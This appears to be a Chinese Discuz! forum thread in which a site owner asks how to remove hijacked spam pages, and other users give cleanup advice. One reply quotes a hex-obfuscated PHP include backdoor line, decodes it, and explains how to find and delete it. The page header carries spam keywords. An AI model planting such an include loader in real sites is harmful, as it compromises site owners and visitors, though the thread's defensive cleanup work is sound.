久久久久av_欧美日韩一区二区在线_国产精品三区四区_日韩中字在线

Discuz! 官方交流社區(qū)

標(biāo)題: 網(wǎng)站被不法分子非法加注黃色小尾巴,怎么破? [打印本頁(yè)]
作者: 明月的大海    時(shí)間: 2020-11-4 19:08
標(biāo)題: 網(wǎng)站被不法分子非法加注黃色小尾巴,怎么破?
百度site自己的網(wǎng)站,發(fā)現(xiàn)被收錄很多黃色鏈接。 就是網(wǎng)址后面被加注 以下參數(shù),就變成非法頁(yè)面了。
http://www.網(wǎng)址.com/tc.html?info=5bqbu68ekq.docx

作者: 鴻茂傳媒    時(shí)間: 2020-11-4 19:54
加強(qiáng)服務(wù)器安全,然后清除木馬。
作者: allthebest    時(shí)間: 2020-11-4 21:59
用以下方法試試

若存在,處理前,先卸載所有盜版插件與模版。

進(jìn)discuz后臺(tái)找到工具-文件校驗(yàn),看下最近有哪些php文件被修改了。

1、排查網(wǎng)站源文件的php 文件,查看是否有出現(xiàn)IP地址、或者異常網(wǎng)站(上面跳轉(zhuǎn)的網(wǎng)站),如果有刪除就可以了。

2、排查網(wǎng)站源文件的php 文件,查看是否有如下代碼:@include($_SERVER['DOCUMENT_ROOT']

(排查一般用WEBshell后門掃描軟件掃描核查!)

如果有就刪除此段代碼。并把該段代碼進(jìn)行解密。

舉例:@include($_SERVER['DOCUMENT_ROOT'].PACK('H*','2F646174612F6176617461722F30'));

需要解密的代碼為:2F646174612F6176617461722F30

解密后為:/data/avatar/0

代碼解密地址:http://www.bejson.com/convert/ox2str/


意思就是在上述路徑下存在被非法上傳的文件,用于做快照劫持。

解決辦法:刪除上面的代碼和文件即可。

掛馬問(wèn)題解決了后,記得更改服務(wù)器相關(guān)的各種密碼,盡量設(shè)置的復(fù)雜一點(diǎn)。
作者: dashen    時(shí)間: 2020-11-12 23:00
這是快照劫持,建議找技術(shù)排查清理后門,加固服務(wù)器



歡迎光臨 Discuz! 官方交流社區(qū) (http://www.9999xn.com/) Powered by Discuz! W1.0